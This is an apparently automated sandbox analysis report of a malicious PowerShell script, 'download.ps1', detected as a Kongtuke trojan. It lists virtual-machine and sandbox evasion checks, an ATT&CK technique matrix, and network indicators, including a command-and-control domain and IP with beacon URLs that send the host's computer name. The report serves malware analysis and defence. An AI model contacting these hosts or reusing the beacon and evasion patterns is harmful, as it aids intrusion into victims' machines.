Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5578Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4255Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7148Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: powershell.exe, 00000000.00000002.2209597536.00000197B935A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
Source: powershell.exe, 00000000.00000002.2245289656.00000197D0672000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IsVirtualMachineMSFT_MpComputerStatusMSFT_MpComputerStatus
Source: powershell.exe, 00000000.00000002.2209597536.00000197B935A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
Source: powershell.exe, 00000000.00000002.2209597536.00000197B8F37000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine
Source: powershell.exe, 00000000.00000002.2245289656.00000197D0672000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll||
Source: powershell.exe, 00000000.00000002.2209597536.00000197B935A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "VMware"
Source: powershell.exe, 00000000.00000002.2209597536.00000197B935A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 1:en-US:VMware
Source: powershell.exe, 00000000.00000002.2209597536.00000197B935A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware`SH
Source: powershell.exe, 00000000.00000002.2209597536.00000197B935A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
Source: powershell.exe, 00000000.00000002.2209597536.00000197B8F37000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "IsVirtualMachine"
Source: powershell.exe, 00000000.00000002.2209597536.00000197B935A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware8
Source: powershell.exe, 00000000.00000002.2209597536.00000197B8F37000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine`SH
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Windows Management Instrumentation
1
DLL Side-Loading
1
Process Injection
121
Virtualization/Sandbox Evasion
OS Credential Dumping21
Security Software Discovery
Remote Services1
Archive Collected Data
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
PowerShell
Boot or Logon Initialization Scripts1
DLL Side-Loading
1
Process Injection
LSASS Memory1
Process Discovery
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Obfuscated Files or Information
Security Account Manager121
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading
NTDS1
Application Window Discovery
Distributed Component Object ModelInput Capture12
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
File and Directory Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials11
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
download.ps113%VirustotalBrowse
download.ps116%ReversingLabsScript-PowerShell.Trojan.Kongtuke
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
www.google.com
142.250.181.132
truefalse
    high
    cmacnnkfbhlcncm.top
    45.61.136.138
    truefalse
      high
      NameMaliciousAntivirus DetectionReputation
      http://cmacnnkfbhlcncm.top/cbym9z28drhtr.php?id=user-PC&key=95448541662&s=527false
        unknown
        http://www.google.com/false
          high
          NameSourceMaliciousAntivirus DetectionReputation
          http://crl.microsoftpowershell.exe, 00000000.00000002.2243637485.00000197D03C0000.00000004.00000020.00020000.00000000.sdmpfalse
            high
            https://photos.google.com/?tab=wq&pageId=nonepowershell.exe, 00000000.00000002.2209597536.00000197BA16E000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              http://www.google.com/preferences?hl=enXpowershell.exe, 00000000.00000002.2209597536.00000197BA16E000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                https://csp.withgoogle.com/csp/gws/other-hppowershell.exe, 00000000.00000002.2235325470.00000197C83F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2209597536.00000197B9A8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2209597536.00000197B9A11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2235325470.00000197C8240000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  https://www.google.com/logos/doodles/2024/rise-of-the-half-moon-december-6753651837110600-2xa.gifpowershell.exe, 00000000.00000002.2209597536.00000197B9A46000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://contoso.com/Licensepowershell.exe, 00000000.00000002.2235325470.00000197C8240000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://news.google.com/?tab=wnpowershell.exe, 00000000.00000002.2209597536.00000197BA16E000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://docs.google.com/document/?usp=docs_alcpowershell.exe, 00000000.00000002.2209597536.00000197BA16E000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://schema.org/WebPagepowershell.exe, 00000000.00000002.2209597536.00000197B9A46000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://0.google.com/powershell.exe, 00000000.00000002.2209597536.00000197B9A8E000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://www.google.com/webhp?tab=wwpowershell.exe, 00000000.00000002.2209597536.00000197BA16E000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://schema.org/WebPageXpowershell.exe, 00000000.00000002.2209597536.00000197B9A8E000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://contoso.com/powershell.exe, 00000000.00000002.2235325470.00000197C8240000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.2235325470.00000197C8240000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://www.google.com/finance?tab=wepowershell.exe, 00000000.00000002.2209597536.00000197BA16E000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://maps.google.com/maps?hl=en&tab=wlpowershell.exe, 00000000.00000002.2209597536.00000197BA16E000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://www.google.compowershell.exe, 00000000.00000002.2209597536.00000197B9A11000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://apis.google.compowershell.exe, 00000000.00000002.2235325470.00000197C83F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2235325470.00000197C81D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2209597536.00000197B9A8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2235325470.00000197C8240000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2209597536.00000197B9C3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2209597536.00000197B9A46000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.2209597536.00000197B81D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://www.blogger.com/?tab=wjpowershell.exe, 00000000.00000002.2209597536.00000197BA16E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://crl.mEpowershell.exe, 00000000.00000002.2209370922.00000197B8156000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    unknown
                                                    http://www.google.com/mobile/?hl=en&tab=wDpowershell.exe, 00000000.00000002.2209597536.00000197BA16E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://play.google.com/?hl=en&tab=w8powershell.exe, 00000000.00000002.2209597536.00000197BA16E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.2235325470.00000197C8240000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://www.google.com/imghp?hl=en&tab=wipowershell.exe, 00000000.00000002.2209597536.00000197BA16E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://www.google.com/shopping?hl=en&source=og&tab=wfpowershell.exe, 00000000.00000002.2209597536.00000197BA16E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://lh3.googleusercontent.com/ogw/default-user=s96powershell.exe, 00000000.00000002.2235325470.00000197C83F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2235325470.00000197C81D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2209597536.00000197B9A8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2235325470.00000197C8240000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2209597536.00000197B9A46000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.2209597536.00000197B83F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000000.00000002.2209597536.00000197B83F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.2209597536.00000197B83F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://drive.google.com/?tab=wopowershell.exe, 00000000.00000002.2209597536.00000197BA16E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://contoso.com/Iconpowershell.exe, 00000000.00000002.2235325470.00000197C8240000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://0.googlepowershell.exe, 00000000.00000002.2209597536.00000197B9A8E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://cmacnnkfbhlcncm.toppowershell.exe, 00000000.00000002.2209597536.00000197B9696000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2209597536.00000197B9A11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              https://mail.google.com/mail/?tab=wmpowershell.exe, 00000000.00000002.2209597536.00000197BA16E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://www.google.com/logos/doodles/2024/rise-of-the-half-moon-december-6753651837110600-2xa.gifXpowershell.exe, 00000000.00000002.2209597536.00000197B9A8E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://$o91mkbr7ed3vtf6/$32nxepuvb0gay75.php?id=$env:computername&key=$xcdjnwvua&s=527powershell.exe, 00000000.00000002.2209597536.00000197B83F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.2209597536.00000197B83F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://www.youtube.com/?tab=w1powershell.exe, 00000000.00000002.2209597536.00000197BA16E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://0.google.powershell.exe, 00000000.00000002.2209597536.00000197B9A8E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://lh3.googleusercontent.com/ogw/default-user=s96Xpowershell.exe, 00000000.00000002.2209597536.00000197BA16E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://0.google.com/powershell.exe, 00000000.00000002.2209597536.00000197B9A8E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://lh3.googleusercontent.com/ogw/default-user=s24powershell.exe, 00000000.00000002.2209597536.00000197B9A46000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://www.google.com/history/optout?hl=enpowershell.exe, 00000000.00000002.2209597536.00000197BA16E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://books.google.com/?hl=en&tab=wppowershell.exe, 00000000.00000002.2209597536.00000197BA16E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://translate.google.com/?hl=en&tab=wTpowershell.exe, 00000000.00000002.2209597536.00000197BA16E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000000.00000002.2209597536.00000197B83F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://www.google.com/intl/en/about/products?tab=whXpowershell.exe, 00000000.00000002.2209597536.00000197BA16E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://www.google.com/logos/doopowershell.exe, 00000000.00000002.2209597536.00000197B9A8E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://calendar.google.com/calendar?tab=wcpowershell.exe, 00000000.00000002.2209597536.00000197BA16E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://aka.ms/pscore68powershell.exe, 00000000.00000002.2209597536.00000197B81D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://lh3.googleusercontent.com/ogw/default-user=s24Xpowershell.exe, 00000000.00000002.2209597536.00000197B9C3E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://crl.microspowershell.exe, 00000000.00000002.2243637485.00000197D03C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    • No. of IPs < 25%
                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                    • 75% < No. of IPs
                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                    45.61.136.138
                                                                                                                    cmacnnkfbhlcncm.topUnited States
                                                                                                                    40676AS40676USfalse
                                                                                                                    142.250.181.132
                                                                                                                    www.google.comUnited States
                                                                                                                    15169GOOGLEUSfalse
                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                    Analysis ID:1579458
                                                                                                                    Start date and time:2024-12-22 13:41:07 +01:00
                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                    Overall analysis duration:0h 4m 28s
                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                    Report type:full
                                                                                                                    Cookbook file name:default.jbs
                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                    Number of analysed new started processes analysed:6
                                                                                                                    Number of new started drivers analysed:0
                                                                                                                    Number of existing processes analysed:0
                                                                                                                    Number of existing drivers analysed:0
                                                                                                                    Number of injected processes analysed:0
                                                                                                                    Technologies:
                                                                                                                    • HCA enabled
                                                                                                                    • EGA enabled
                                                                                                                    • AMSI enabled
                                                                                                                    Analysis Mode:default
                                                                                                                    Analysis stop reason:Timeout
                                                                                                                    Sample name:download.ps1
                                                                                                                    Detection:MAL
                                                                                                                    Classification:mal76.evad.winPS1@2/7@2/2
                                                                                                                    EGA Information:Failed
                                                                                                                    HCA Information:
                                                                                                                    • Successful, ratio: 100%
                                                                                                                    • Number of executed functions: 14
                                                                                                                    • Number of non-executed functions: 5
                                                                                                                    Cookbook Comments:
                                                                                                                    • Found application associated with file extension: .ps1
                                                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                                                                                                                    • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56
                                                                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                    • Execution Graph export aborted for target powershell.exe, PID 5540 because it is empty
                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                    TimeTypeDescription
                                                                                                                    07:42:06API Interceptor45x Sleep call for process: powershell.exe modified
                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    45.61.136.138download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                    • cmacnnkfbhlcncm.top/kzqvgnd7b0htr.php?id=computer&key=74093808379&s=527
                                                                                                                    download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                    • cmacnnkfbhlcncm.top/yudn6r4exvhtr.php?id=computer&key=71902578316&s=527
                                                                                                                    download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                    • cmacnnkfbhlcncm.top/4sqjhclnathtr.php?id=user-PC&key=146061803000&s=527
                                                                                                                    download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                    • cmacnnkfbhlcncm.top/5jmw10tyqfhtr.php?id=user-PC&key=113750624201&s=527
                                                                                                                    download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                    • cmacnnkfbhlcncm.top/o019zcxwsfhtr.php?id=user-PC&key=94248264203&s=527
                                                                                                                    download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                    • cmacnnkfbhlcncm.top/lbs39er51ghtr.php?id=computer&key=31400257058&s=527
                                                                                                                    download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                    • cmacnnkfbhlcncm.top/xqceolfz5dhtr.php?id=user-PC&key=58037436404&s=527
                                                                                                                    download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                    • cmacnnkfbhlcncm.top/cmx2nrhlu7htr.php?id=computer&key=24412706494&s=527
                                                                                                                    download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                    • cmacnnkfbhlcncm.top/57fd316pguhtr.php?id=computer&key=75439930857&s=527
                                                                                                                    download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                    • cmacnnkfbhlcncm.top/rz932vog4whtr.php?id=user-PC&key=63562548914&s=527
                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    cmacnnkfbhlcncm.topdownload.ps1Get hashmaliciousUnknownBrowse
                                                                                                                    • 45.61.136.138
                                                                                                                    download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                    • 45.61.136.138
